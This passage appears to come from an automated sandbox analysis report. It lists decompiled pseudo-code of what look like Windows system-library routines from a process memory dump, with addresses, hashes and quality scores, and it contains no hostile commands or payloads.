3, &_v60) == 0) { _v80 = _v80 | 0xffffffff; _push( &_v84); _push(0); _push(_v64); _v84 = 0xfa0a1f00; E010F9520(); } } } } } if(_v64 != 0) { _push(_v64); E010F95D0(); *(_t79 + 0xf70) = *(_t79 + 0xf70) & 0x00000000; *(_t79 + 0xf74) = *(_t79 + 0xf74) & 0x00000000; } if(_t77 != 0) { E010CFFB0(_t68, _t77, 0x11a8778); } _pop(_t78); return E010FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79); } 0x011369b5 0x011369be 0x011369c3 0x011369c9 0x011369cc 0x011369d1 0x011369d3 0x011369de 0x011369e1 0x011369ea 0x011369f6 0x011369fe 0x01136a13 0x01136a14 0x01136a15 0x01136a16 0x01136a1e 0x01136a26 0x01136a31 0x01136a36 0x01136a37 0x01136a40 0x01136a49 0x01136a4a 0x01136a53 0x01136a59 0x01136a5d 0x01136a5e 0x01136a64 0x01136a67 0x01136a6a 0x01136a6d 0x01136a70 0x01136a77 0x01136a7d 0x01136a86 0x01136a89 0x01136a9c 0x01136a9f 0x01136aa2 0x01136aa5 0x01136aaf 0x01136ab1 0x01136ab8 0x01136ab9 0x01136abb 0x01136abe 0x01136ac5 0x01136ac5 0x01136aaf 0x01136a40 0x01136a26 0x011369fe 0x01136ace 0x01136ad0 0x01136ad3 0x01136ad8 0x01136adf 0x01136adf 0x01136ae8 0x01136aef 0x01136aef 0x01136af9 0x01136b06

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: afb17bf654ac97293d4984cd5e4933eab2ea5dd7a0a70801263576e721e00ea2 Instruction ID: 517bb4460262955260a5b303cd0acb2db7bce92c73e9927b232a321fbf29dc3a Opcode Fuzzy Hash: afb17bf654ac97293d4984cd5e4933eab2ea5dd7a0a70801263576e721e00ea2 Instruction Fuzzy Hash: 62418DB1D00209AFDB28DFA9D940BFEBBF4EF48714F04812AE954A7244DB709906CB50

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

E010B5210(intOrPtr _a4, void* _a8) { void* __ecx; intOrPtr _t31; signed int _t32; signed int _t33; intOrPtr _t35; signed int _t52; void* _t54; void* _t56; unsigned int _t59; signed int _t60; void* _t61; _t61 = E010B52A5(1); if(_t61 == 0) { _t31 = *((intOrPtr*)( *[fs:0x30] + 0x10)); _t54 = *((intOrPtr*)(_t31 + 0x28)); _t59 = *(_t31 + 0x24) & 0x0000ffff; } else { _t54 = *((intOrPtr*)(_t61 + 0x10)); _t59 = *(_t61 + 0xc) & 0x0000ffff; } _t60 = _t59 >> 1; _t32 = 0x3a; if(_t60 < 2 || *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) { _t52 = _t60 + _t60; if(_a4 > _t52) { goto L5; } if(_t61 != 0) { asm("lock xadd [esi], eax"); if((_t32 | 0xffffffff) == 0) { _push( *((intOrPtr*)(_t61 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61); } } else { E010CEB70(_t54, 0x11a79a0); } _t26 = _t52 + 2; // 0xddeeddf0 return _t26; } else { _t52 = _t60 + _t60; if(_a4 < _t52) { if(_t61 != 0) { asm("lock xadd [esi], eax"); if((_t32 | 0xffffffff) == 0) { _push( *((intOrPtr*)(_t61 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61); } } else { E010CEB70(_t54, 0x11a79a0); } return _t52; } L5: _t33 = E010FF3E0(_a8, _t54, _t52); if(_t61 == 0) { E010CEB70(_t54, 0x11a79a0); } else { asm("lock xadd [esi], eax"); if((_t33 | 0xffffffff) == 0) { _push( *((intOrPtr*)(_t61 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61); } } _t35 = _a8; if(_t60 <= 1) { L9: _t60 = _t60 - 1; *((short*)(_t52 + _t35 - 2)) = 0; goto L10; } else { _t56 = 0x3a; if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) { *((short*)(_t52 + _t35)) = 0; L10: return _t60 + _t60; } goto L9; } } } 0x010b5220 0x010b5224 0x01110d13 0x01110d16 0x01110d19 0x010b522a 0x010b522a 0x010b522d 0x010b522d 0x010b5231 0x010b5235 0x010b5239 0x01110d5c 0x01110d62 0x00000000 0x00000000 0x01110d6a 0x01110d7b 0x01110d7f 0x01110d81 0x01110d84 0x01110d95 0x01110d95 0x01110d6c 0x01110d71 0x01110d71 0x01110d9a 0x00000000 0x010b524a 0x010b524a 0x010b5250 0x01110d24 0x01110d35 0x01110d39 0x01110d3b 0x01110d3e 0x01110d50 0x01110d50 0x01110d26 0x01110d2b 0x01110d2b 0x00000000 0x01110d55 0x010b5256 0x010b525b 0x010b5265 0x01110da7 0x010b526b 0x010b526e 0x010b5272 0x01110db1 0x01110db4 0x01110dc5 0x01110dc5 0x010b5272 0x010b5278 0x010b527e 0x010b528a 0x010b528c 0x010b528d 0x00000000 0x010b5280 0x010b5282 0x010b5288 0x010b529f 0x010b5292 0x00000000 0x010b5292 0x00000000 0x010b5288 0x010b527e

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: cd1c65878e3dfbbbe0b19a3f1c197aee923d7597202cd79706c67b6475c20980 Instruction ID: 0a6ee5165d54810b6e4bc6232d1829c7693bbe6512eb31aa53bce21e7d67c893 Opcode Fuzzy Hash: cd1c65878e3dfbbbe0b19a3f1c197aee923d7597202cd79706c67b6475c20980 Instruction Fuzzy Hash: 0F314831642601DBCB2AAB18CC81BAEBBA5FF15B20F51462AF5950B594E730EC40CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) { intOrPtr _v8; char _v12; signed short** _t33; short* _t38; intOrPtr* _t39; intOrPtr* _t41; signed short _t43; intOrPtr* _t47; intOrPtr* _t53; signed short _t57; intOrPtr _t58; signed short _t60; signed short* _t61; _t47 = __ecx; _t61 = __edx; _t60 = ( *__ecx & 0x0000ffff) + 2; if(_t60 > 0xfffe) { L22: return 0xc0000106; } if(__edx != 0) { if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) { L5: E010C7B60(0, _t61, 0x10911c4); _v12 = *_t47; _v12 = _v12 + 0xfff8; _v8 = *((intOrPtr*)(_t47 + 4)) + 8; E010C7B60(0xfff8, _t61, &_v12); _t33 = _a8; if(_t33 != 0) { *_t33 = _t61; } *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0; _t53 = _a12; if(_t53 != 0) { _t57 = _t61[2]; _t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2; while(_t38 >= _t57) { if( *_t38 == 0x5c) { _t41 = _t38 + 2; if(_t41 == 0) { break; } _t58 = 0; if( *_t41 == 0) { L19: *_t53 = _t58; goto L7; } *_t53 = _t41; goto L7; } _t38 = _t38 - 2; } _t58 = 0; goto L19; } else { L7: _t39 = _a16; if(_t39 != 0) { *_t39 = 0; *((intOrPtr*)(_t39 + 4)) = 0; *((intOrPtr*)(_t39 + 8)) = 0; *((intOrPtr*)(_t39 + 0xc)) = 0; } return 0; } } _t61 = _a4; if(_t61 != 0) { L3: _t43 = L010D4620(0, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60); _t61[2] = _t43; if(_t43 == 0) { return 0xc0000017; } _t61[1] = _t60; *_t61 = 0; goto L5; } goto L22; } _t61 = _a4; if(_t61 == 0) { return 0xc000000d; } goto L3; } 0x010f3d4c 0x010f3d50 0x010f3d55 0x010f3d5e 0x0112e79a 0x00000000 0x0112e79a 0x010f3d68 0x0112e789 0x010f3d9d 0x010f3da3 0x010f3daf 0x010f3db5 0x010f3dbc 0x010f3dc4 0x010f3dc9 0x010f3dce 0x0112e7ae 0x0112e7ae 0x010f3dde 0x010f3de2 0x010f3de7 0x010f3e0d 0x010f3e13 0x010f3e16 0x010f3e1e 0x010f3e25 0x010f3e28 0x00000000 0x00000000 0x010f3e2a 0x010f3e2f 0x010f3e37 0x010f3e37 0x00000000 0x010f3e37 0x010f3e31 0x00000000 0x010f3e31 0x010f3e20 0x010f3e20 0x010f3e35 0x00000000 0x010f3de9 0x010f3de9 0x010f3de9 0x010f3dee 0x010f3dfd 0x010f3dff 0x010f3e02 0x010f3e05 0x010f3e05 0x00000000 0x010f3df0 0x010f3de7 0x0112e78f 0x0112e794 0x010f3d79 0x010f3d84 0x010f3d89 0x010f3d8e 0x00000000 0x0112e7a4 0x010f3d96 0x010f3d9a 0x00000000 0x010f3d9a 0x00000000 0x0112e794 0x010f3d6e 0x010f3d73 0x00000000 0x0112e7b5 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: d5c9982c79574a85f21146b06b8a5e8a6347fa626353c9e0df51118ea05c96bb Instruction ID: bee9971b1944f082778bea4c71a827bf8ae8c4e495783d01b6d1a3e602840342 Opcode Fuzzy Hash: d5c9982c79574a85f21146b06b8a5e8a6347fa626353c9e0df51118ea05c96bb Instruction Fuzzy Hash: 6D31B071601625DBD7299F2DD442A6BBBF5FF45720B05806EEA86CFB90E730D840C790

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%

E010EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr _t35; intOrPtr _t39; intOrPtr _t45; intOrPtr* _t51; intOrPtr* _t52; intOrPtr* _t55; signed int _t57; intOrPtr* _t59; intOrPtr _t68; intOrPtr* _t77; void* _t79; signed int _t80; intOrPtr _t81; char* _t82; void* _t83; _push(0x24); _push(0x1190220); E0110D08C(__ebx, __edi, __esi); *((intOrPtr*)(_t83 - 0x30)) = __edx; _t79 = __ecx; _t35 = *0x11a7b9c; // 0x0 _t55 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28); *((intOrPtr*)(_t83 - 0x24)) = _t55; if(_t55 == 0) { _t39 = 0xc0000017; L11: return E0110D0D1(_t39); } _t68 = 0; *((intOrPtr*)(_t83 - 0x1c)) = 0; *(_t83 - 4) = *(_t83 - 4) & 0; _t7 = _t55 + 8; // 0x8 _t57 = 6; memcpy(_t7, _t79, _t57 << 2); _t80 = 0xfffffffe; *(_t83 - 4) = _t80; if(0 < 0) { L14: _t81 = *((intOrPtr*)(_t83 - 0x1c)); L20: L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55); _t39 = _t81; goto L11; } if( *((intOrPtr*)(_t55 + 0xc)) < *(_t55 + 8)) { _t81 = 0xc000007b; goto L20; } if( *((intOrPtr*)(_t83 + 0xc)) == 0) { _t59 = *((intOrPtr*)(_t83 + 8)); _t45 = *_t59; *((intOrPtr*)(_t83 - 0x20)) = _t45; *_t59 = _t45 + 1; L6: *(_t83 - 4) = 1; *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) = *((intOrPtr*)(_t83 - 0x20)); *(_t83 - 4) = _t80; if(_t68 < 0) { _t82 = *((intOrPtr*)(_t83 + 0xc)); if(_t82 == 0) { goto L14; } asm("btr eax, ecx"); _t81 = *((intOrPtr*)(_t83 - 0x1c)); if( *_t82 != 0) { *0x11a7b10 = *0x11a7b10 - 8; } goto L20; } *((intOrPtr*)(_t55 + 0x24)) = *((intOrPtr*)(_t83 - 0x20)); *((intOrPtr*)(_t55 + 0x20)) = *((intOrPtr*)(_t83 - 0x30)); _t51 = *0x11a536c; // 0x5eb118 if( *_t51 != 0x11a5368) { _push(3); asm("int 0x29"); goto L14; } *_t55 = 0x11a5368; *((intOrPtr*)(_t55 + 4)) = _t51; *_t51 = _t55; *0x11a536c = _t55; _t52 = *((intOrPtr*)(_t83 + 0x10)); if(_t52 != 0) { *_t52 = _t55; } _t39 = 0; goto L11; } _t77 = *((intOrPtr*)(_t83 + 8)); _t68 = E010EA70E(_t77, *((intOrPtr*)(_t83 + 0xc))); *((intOrPtr*)(_t83 - 0x1c)) = _t68; if(_t68 < 0) { goto L14; } *((intOrPtr*)(_t83 - 0x20)) = *_t77; goto L6; } 0x010ea61c 0x010ea61e 0x010ea623 0x010ea628 0x010ea62b 0x010ea62d 0x010ea648 0x010ea64a 0x010ea64f 0x01129b44 0x010ea6ec 0x010ea6f1 0x010ea6f1 0x010ea655 0x010ea657 0x010ea65a 0x010ea65d 0x010ea662 0x010ea663 0x010ea667 0x010ea668 0x010ea66d 0x010ea706 0x010ea706 0x01129bda 0x01129be6 0x01129beb 0x00000000 0x01129beb 0x010ea679 0x01129b7a 0x00000000 0x01129b7a 0x010ea683 0x010ea6f4 0x010ea6f7 0x010ea6f9 0x010ea6fd 0x010ea6a0 0x010ea6a0 0x010ea6ad 0x010ea6af 0x010ea6b4 0x01129ba7 0x01129bac 0x00000000 0x00000000 0x01129bc6 0x01129bce 0x01129bd1 0x01129bd3 0x01129bd3 0x00000000 0x01129bd1 0x010ea6bd 0x010ea6c3 0x010ea6c6 0x010ea6d2 0x010ea701 0x010ea704 0x00000000 0x010ea704 0x010ea6d4 0x010ea6d6 0x010ea6d9 0x010ea6db 0x010ea6e1 0x010ea6e6 0x010ea6e8 0x010ea6e8 0x010ea6ea 0x00000000 0x010ea6ea 0x010ea688 0x010ea692 0x010ea694 0x010ea699 0x00000000 0x00000000 0x010ea69d 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: c93db037ffba1bffc43561a969abc34cb3de1ede383cfec6b2c61f515c61428f Instruction ID: 2437ed5f416afe3336ac614f6160b4147a647ee3af77785ea00ec755854ec332 Opcode Fuzzy Hash: c93db037ffba1bffc43561a969abc34cb3de1ede383cfec6b2c61f515c61428f Instruction Fuzzy Hash: CA4189B5A04219DFCB19CF59C890B99BBF2BF8D304F1980A9E955AB384C374A941CF60

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%

E010DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) { signed int* _v8; char _v16; void* __ebx; void* __edi; signed char _t33; signed char _t43; signed char _t48; signed char _t62; void* _t63; intOrPtr _t69; intOrPtr _t71; unsigned int* _t82; void* _t83; _t80 = __ecx; _t82 = __edx; _t33 = *((intOrPtr*)(__ecx + 0xde)); _t62 = _t33 >> 0x00000001 & 0x00000001; if((_t33 & 0x00000001) != 0) { _v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx; if(E010D7D50() != 0) { _t43 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } else { _t43 = 0x7ffe0386; } if( *_t43 != 0) { _t43 = E01188D34(_v8, _t80); } E010D2280(_t43, _t82); if( *((char*)(_t80 + 0xdc)) == 0) { E010CFFB0(_t62, _t80, _t82); *(_t80 + 0xde) = *(_t80 + 0xde) | 0x00000004; _t30 = _t80 + 0xd0; // 0xd0 _t83 = _t30; E01188833(_t83, &_v16); _t81 = _t80 + 0x90; E010CFFB0(_t62, _t80 + 0x90, _t80 + 0x90); _t63 = 0; _push(0); _push(_t83); _t48 = E010FB180(); if(_a4 != 0) { E010D2280(_t48, _t81); } } else { _t69 = _v8; _t12 = _t80 + 0x98; // 0x98 _t13 = _t69 + 0xc; // 0x575651ff E010DBB2D(_t13, _t12); _t71 = _v8; _t15 = _t80 + 0xb0; // 0xb0 _t16 = _t71 + 8; // 0x8b000cc2 E010DBB2D(_t16, _t15); E010DB944(_v8, _t62); *((char*)(_t80 + 0xdc)) = 0; E010CFFB0(0, _t80, _t82); *((intOrPtr*)(_t80 + 0xd8)) = 0; *((intOrPtr*)(_t80 + 0xc8)) = 0; *((intOrPtr*)(_t80 + 0xcc)) = 0; *(_t80 + 0xde) = 0; if(_a4 == 0) { _t25 = _t80 + 0x90; // 0x90 E010CFFB0(0, _t80, _t25); } _t63 = 1; } return _t63; } *((intOrPtr*)(__ecx + 0xc8)) = 0; *((intOrPtr*)(__ecx + 0xcc)) = 0; if(_a4 == 0) { _t24 = _t80 + 0x90; // 0x90 E010CFFB0(0, __ecx, _t24); } return 0; } 0x010dc18d 0x010dc18f 0x010dc191 0x010dc19b 0x010dc1a0 0x010dc1d4 0x010dc1de 0x01122d6e 0x010dc1e4 0x010dc1e4 0x010dc1e4 0x010dc1ec 0x01122d7d 0x01122d7d 0x010dc1f3 0x010dc1ff 0x01122d88 0x01122d8d 0x01122d94 0x01122d94 0x01122d9f 0x01122da4 0x01122dab 0x01122db0 0x01122db2 0x01122db3 0x01122db4 0x01122dbc 0x01122dc3 0x01122dc3 0x010dc205 0x010dc205 0x010dc208 0x010dc20e 0x010dc211 0x010dc216 0x010dc219 0x010dc21f 0x010dc222 0x010dc22c 0x010dc234 0x010dc23a 0x010dc23f 0x010dc245 0x010dc24b 0x010dc251 0x010dc25a 0x010dc276 0x010dc27d 0x010dc27d 0x010dc25c 0x010dc25c 0x00000000 0x010dc25e 0x010dc1a4 0x010dc1aa 0x010dc1b3 0x010dc265 0x010dc26c 0x010dc26c 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea Instruction ID: 672a4a2729e5fca0fa44eb6dc4fa69c25623d066feae3700e2dcb2fd51a4dac0 Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea Instruction Fuzzy Hash: 0631147260168BBEE709EBB4C580BFDFB95BF52204F04415ED49C47201DB346A16CBA1

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E01137016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) { signed int _v8; char _v588; intOrPtr _v592; intOrPtr _v596; signed short* _v600; char _v604; short _v606; void* __ebx; void* __edi; void* __esi; signed short* _t55; void* _t56; signed short* _t58; signed char* _t61; char* _t68; void* _t69; void* _t71; void* _t72; signed int _t75; _t64 = __edx; _t77 = (_t75 & 0xfffffff8) - 0x25c; _v8 = *0x11ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c; _t55 = _a16; _v606 = __ecx; _t71 = 0; _t58 = _a12; _v596 = __edx; _v600 = _t58; _t68 = &_v588; if(_t58 != 0) { _t71 = ( *_t58 & 0x0000ffff) + 2; if(_t55 != 0) { _t71 = _t71 + ( *_t55 & 0x0000ffff) + 2; } } _t8 = _t71 + 0x2a; // 0x28 _t33 = _t8; _v592 = _t8; if(_t71 <= 0x214) { L6: *((short*)(_t68 + 6)) = _v606; if(_t64 != 0xffffffff) { asm("cdq"); *((intOrPtr*)(_t68 + 0x20)) = _t64; *((char*)(_t68 + 0x28)) = _a4; *((intOrPtr*)(_t68 + 0x24)) = _t64; *((char*)(_t68 + 0x29)) = _a8; if(_t71 != 0) { _t22 = _t68 + 0x2a; // 0x2a _t64 = _t22; E01136B4C(_t58, _t22, _t71, &_v604); if(_t55 != 0) { _t25 = _v604 + 0x2a; // 0x2a _t64 = _t25 + _t68; E01136B4C(_t55, _t25 + _t68, _t71 - _v604, &_v604); } if(E010D7D50() == 0) { _t61 = 0x7ffe0384; } else { _t61 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } _push(_t68); _push(_v592 + 0xffffffe0); _push(0x402); _push( *_t61 & 0x000000ff); E010F9AE0(); } } _t35 = &_v588; if( &_v588 != _t68) { _t35 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68); } L16: _pop(_t69); _pop(_t72); _pop(_t56); return E010FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72); } _t68 = L010D4620(_t58, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33); if(_t68 == 0) { goto L16; } else { _t58 = _v600; _t64 = _v596; goto L6; } } 0x01137016 0x0113701e 0x0113702b 0x01137033 0x01137037 0x0113703c 0x0113703e 0x01137041 0x01137045 0x0113704a 0x01137050 0x01137055 0x0113705a 0x01137062 0x01137062 0x0113705a 0x01137064 0x01137064 0x01137067 0x01137071 0x01137096 0x0113709b 0x011370a2 0x011370a6 0x011370a7 0x011370ad 0x011370b3 0x011370b6 0x011370bb 0x011370c3 0x011370c3 0x011370c6 0x011370cd 0x011370dd 0x011370e0 0x011370e2 0x011370e2 0x011370ee 0x01137101 0x011370f0 0x011370f9 0x011370f9 0x0113710a 0x0113710e 0x01137112 0x01137117 0x01137118 0x01137118 0x011370bb 0x0113711d 0x01137123 0x01137131 0x01137131 0x01137136 0x0113713d 0x0113713e 0x0113713f 0x0113714a 0x0113714a 0x01137084 0x01137088 0x00000000 0x0113708e 0x0113708e 0x01137092 0x00000000 0x01137092

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 97120f0e708a5e931f70431897ab9445b5d9a6084b1bc53005cafce53e9c4557 Instruction ID: 332719a0e5c6c3a982f262eb8b6b9689e7cd5bb513d2ffa4faece21334a7b616 Opcode Fuzzy Hash: 97120f0e708a5e931f70431897ab9445b5d9a6084b1bc53005cafce53e9c4557 Instruction Fuzzy Hash: 0D31C4B26047519BD325DF28C840AAAB7E5FFC9700F044A2DF99597694E730E904CBA6

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E010F6DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) { intOrPtr _v8; intOrPtr _t39; intOrPtr _t52; intOrPtr _t53; signed int _t59; signed int _t63; intOrPtr _t64; intOrPtr* _t66; void* _t68; intOrPtr _t69; signed int _t73; signed int _t75; intOrPtr _t77; signed int _t80; intOrPtr _t82; _t68 = __edx; _push(__ecx); _t80 = __ecx; _t75 = _a4; if(__edx > *((intOrPtr*)(__ecx + 0x90))) { L23: asm("lock inc dword [esi+0x110]"); if(( *(_t80 + 0xd4) & 0x00010000) != 0) { asm("lock inc dword [ecx+eax+0x4]"); } _t39 = 0; L13: return _t39; } _t63 = *(__ecx + 0x88); _t4 = _t68 + 7; // 0xa _t69 = *((intOrPtr*)(__ecx + 0x8c)); _t59 = _t4 & 0xfffffff8; _v8 = _t69; if(_t75 >= _t63) { _t75 = _t75 % _t63; L15: _t69 = _v8; } _t64 = *((intOrPtr*)(_t80 + 0x17c + _t75 * 4)); if(_t64 == 0) { L14: if(E010F6EBE(_t80, _t64, _t75) != 1) { goto L23; } goto L15; } asm("lock inc dword [ecx+0xc]"); if( *((intOrPtr*)(_t64 + 0x2c)) != 1 || *((intOrPtr*)(_t64 + 8)) > _t69) { goto L14; } else { _t73 = _t59; asm("lock xadd [eax], edx"); if(_t73 + _t59 > _v8) { if(_t73 <= _v8) { *(_t64 + 4) = _t73; } goto L14; } _t77 = _t73 + _t64; _v8 = _t77; *_a12 = _t64; _t66 = _a8; if(_t66 == 0) { L12: _t39 = _t77; goto L13; } _t52 = *((intOrPtr*)(_t80 + 0x10)); if(_t52 != 0) { _t53 = _t52 - 1; if(_t53 == 0) { asm("rdtsc"); *_t66 = _t53; L11: *(_t66 + 4) = _t73; goto L12; } E010E6A60(_t66); goto L12; } while(1) { _t73 = *0x7ffe0018; _t82 = *0x7FFE0014; if(_t73 == *0x7FFE001C) { break; } asm("pause"); } _t66 = _a8; _t77 = _v8; *_t66 = _t82; goto L11; } } 0x010f6de6 0x010f6dee 0x010f6df1 0x010f6df4 0x010f6dfd 0x011305d3 0x011305d3 0x011305e4 0x011305f9 0x011305f9 0x011305fe 0x010f6e96 0x010f6e9c 0x010f6e9c 0x010f6e03 0x010f6e09 0x010f6e0c 0x010f6e12 0x010f6e15 0x010f6e1b 0x011305a1 0x010f6eb1 0x010f6eb1 0x010f6eb1 0x010f6e21 0x010f6e2a 0x010f6e9f 0x010f6eab 0x00000000 0x00000000 0x00000000 0x010f6eab 0x010f6e2c 0x010f6e34 0x00000000 0x010f6e3d 0x010f6e3d 0x010f6e42 0x010f6e4d 0x011305ac 0x011305b2 0x011305b2 0x00000000 0x011305ac 0x010f6e56 0x010f6e59 0x010f6e5d 0x010f6e5f 0x010f6e64 0x010f6e94 0x010f6e94 0x00000000 0x010f6e94 0x010f6e6a 0x010f6e6d 0x011305ba 0x011305bd 0x011305ca 0x011305cc 0x010f6e91 0x010f6e91 0x00000000 0x010f6e91 0x011305c0 0x00000000 0x011305c0 0x010f6e7e 0x010f6e7e 0x010f6e80 0x010f6e86 0x00000000 0x00000000 0x010f6eba 0x010f6eba 0x010f6e88 0x010f6e8b 0x010f6e8f 0x00000000 0x010f6e8f

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838 Instruction ID: 33017f03d8b12718f5f65c430033a41147c648f0d4641f577e9cc4a64aa7ef38 Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838 Instruction Fuzzy Hash: 4E31C332204205DFC729CF29C481AAAB7E6FFC5314B14C95EE59A8B655DB32F802CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%

E010EA70E(intOrPtr* __ecx, char* __edx) { unsigned int _v8; intOrPtr* _v12; void* __ebx; void* __edi; void* __esi; void* _t16; intOrPtr _t17; intOrPtr _t28; char* _t33; intOrPtr _t37; intOrPtr _t38; void* _t50; intOrPtr _t52; _push(__ecx); _push(__ecx); _t52 = *0x11a7b10; // 0x9 _t33 = __edx; _t48 = __ecx; _v12 = __ecx; if(_t52 == 0) { *0x11a7b10 = 8; *0x11a7b14 = 0x11a7b0c; *0x11a7b18 = 1; L6: _t2 = _t52 + 1; // 0xa E010EA990(0x11a7b10, _t2, 7); asm("bts ecx, eax"); *_t48 = _t52; *_t33 = 1; L3: _t16 = 0; L4: return _t16; } _t17 = L010EA840(__edx, __ecx, __ecx, _t52, 0x11a7b10, 1, 0); if(_t17 == 0xffffffff) { _t37 = *0x11a7b10; // 0x9 _t3 = _t37 + 0x27; // 0x30 __eflags = _t3 >> 5 - *0x11a7b18; // 0x1 if(__eflags > 0) { _t38 = *0x11a7b9c; // 0x0 _t4 = _t52 + 0x27; // 0x30 _v8 = _t4 >> 5; _t50 = L010D4620(_t38 + 0xc0000, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2); __eflags = _t50; if(_t50 == 0) { _t16 = 0xc0000017; goto L4; } *0x11a7b18 = _v8; _t8 = _t52 + 7; // 0x10 E010FF3E0(_t50, *0x11a7b14, _t8 >> 3); _t28 = *0x11a7b14; // 0x776f7b0c __eflags = _t28 - 0x11a7b0c; if(_t28 != 0x11a7b0c) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28); } _t9 = _t52 + 8; // 0x11 *0x11a7b14 = _t50; _t48 = _v12; *0x11a7b10 = _t9; goto L6; } *0x11a7b10 = _t37 + 8; goto L6; } *__ecx = _t17; *_t33 = 0; goto L3; } 0x010ea713 0x010ea714 0x010ea717 0x010ea71d 0x010ea720 0x010ea722 0x010ea727 0x010ea74a 0x010ea754 0x010ea75e 0x010ea768 0x010ea76a 0x010ea773 0x010ea78b 0x010ea790 0x010ea792 0x010ea741 0x010ea741 0x010ea743 0x010ea749 0x010ea749 0x010ea732 0x010ea73a 0x010ea797 0x010ea79d 0x010ea7a3 0x010ea7a9 0x010ea7b6 0x010ea7bc 0x010ea7ca 0x010ea7e0 0x010ea7e2 0x010ea7e4 0x01129bf2 0x00000000 0x01129bf2 0x010ea7ed 0x010ea7f2 0x010ea800 0x010ea805 0x010ea80d 0x010ea812 0x01129c08 0x01129c08 0x010ea818 0x010ea81b 0x010ea821 0x010ea824 0x00000000 0x010ea824 0x010ea7ae 0x00000000 0x010ea7ae 0x010ea73c 0x010ea73e 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

